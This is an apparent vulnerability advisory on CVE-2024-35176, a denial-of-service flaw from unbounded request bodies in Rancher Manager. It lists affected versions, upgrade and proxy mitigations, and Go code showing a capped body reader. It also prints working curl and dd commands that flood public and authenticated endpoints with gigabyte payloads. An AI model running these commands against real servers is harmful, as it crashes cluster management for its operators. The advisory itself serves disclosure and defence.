Rancher Manager, Request Body Size Limit DoS, CVE-2024-35176 (Critical)


The vulnerability exists because Rancher Manager lacks a default maximum request body size limit on certain public (/v3-public/) and authenticated API endpoints. When a request reaches a vulnerable endpoint, the entire body is read into the server's memory without any size validation. An attacker can exploit this by sending HTTP POST or PUT requests with extremely large payloads (e.g., several gigabytes), each of which is fully buffered in memory while it is processed. By repeatedly sending such requests, the attacker drives the Rancher Manager's memory usage up until available system memory is exhausted, leaving the application unresponsive or crashed and disrupting management of all downstream Kubernetes clusters.
Platform: Rancher Manager
Version: < 2.9.12, < 2.10.9, < 2.11.5, < 2.12.1
Vulnerability: DoS
Severity: Critical

date: 2024-08-28

Prediction: 2024-09-11

What Undercode Says:

Simulating a request to a vulnerable /v3-public endpoint
curl -X POST "https://<rancher-server>/v3-public/someEndpoint" -H "Content-Type: application/json" --data-binary @/dev/zero
Using a large file
dd if=/dev/zero of=large_payload.bin bs=1G count=10
curl -X PUT "https://<rancher-server>/v3/authenticated/endpoint" -H "Authorization: Bearer <token>" -H "Content-Type: application/octet-stream" --data-binary @large_payload.bin
Monitoring memory usage on the Rancher server during the attack
watch -n 1 'ps -eo pid,comm,rss | grep rancher'

How the exploit works:

An attacker sends oversized HTTP requests to unauthenticated `/v3-public/` or authenticated API endpoints, consuming all available memory on the Rancher Manager server, causing a complete DoS.

Protection from this CVE:

Upgrade to Rancher Manager v2.12.1, v2.11.5, v2.10.9, or v2.9.12. For versions that cannot be patched yet, place a reverse proxy (e.g., nginx) in front of Rancher and enforce a client_max_body_size limit so oversized requests are rejected before they reach the application.
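As an added illustration (not Rancher's code), the following Go handlers contrast the unbounded-read pattern the advisory describes with a version capped using http.MaxBytesReader from the standard library; the 1 MiB limit and the "/v3-public/example" path are assumed for the demo only.

```go
package main

import (
	"errors"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// maxBodyBytes is an assumed limit for this demo; in a real deployment size it
// to the largest legitimate payload the endpoint accepts.
const maxBodyBytes = 1 << 20 // 1 MiB

// vulnerableHandler shows the pattern the advisory describes: the whole body is
// buffered in memory with no upper bound, so the client dictates heap use.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	if _, err := io.ReadAll(r.Body); err != nil {
		http.Error(w, "read error", http.StatusBadRequest)
		return
	}
	w.WriteHeader(http.StatusOK)
}

// hardenedHandler wraps the body in http.MaxBytesReader, which stops reading
// once maxBodyBytes is exceeded, so memory use is capped no matter what
// Content-Length claims or how long the client keeps streaming.
func hardenedHandler(w http.ResponseWriter, r *http.Request) {
	r.Body = http.MaxBytesReader(w, r.Body, maxBodyBytes)
	if _, err := io.ReadAll(r.Body); err != nil {
		var tooLarge *http.MaxBytesError
		if errors.As(err, &tooLarge) {
			http.Error(w, "request body too large", http.StatusRequestEntityTooLarge)
			return
		}
		http.Error(w, "read error", http.StatusBadRequest)
		return
	}
	w.WriteHeader(http.StatusOK)
}

// post drives a handler in-process with an n-byte body (no network) and
// returns the status it produced; the path is a placeholder, not a real route.
func post(h http.HandlerFunc, n int) int {
	req := httptest.NewRequest(http.MethodPost, "/v3-public/example", strings.NewReader(strings.Repeat("A", n)))
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}
```

The same cap can be applied once for every route by wrapping the router in a middleware that sets r.Body before dispatch, which is the in-process equivalent of the reverse-proxy limit above.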

Impact:

Memory exhaustion leads to a full denial-of-service, crashing Rancher Manager and disrupting management operations for all downstream Kubernetes clusters.


Sources:

Reported By: github.com
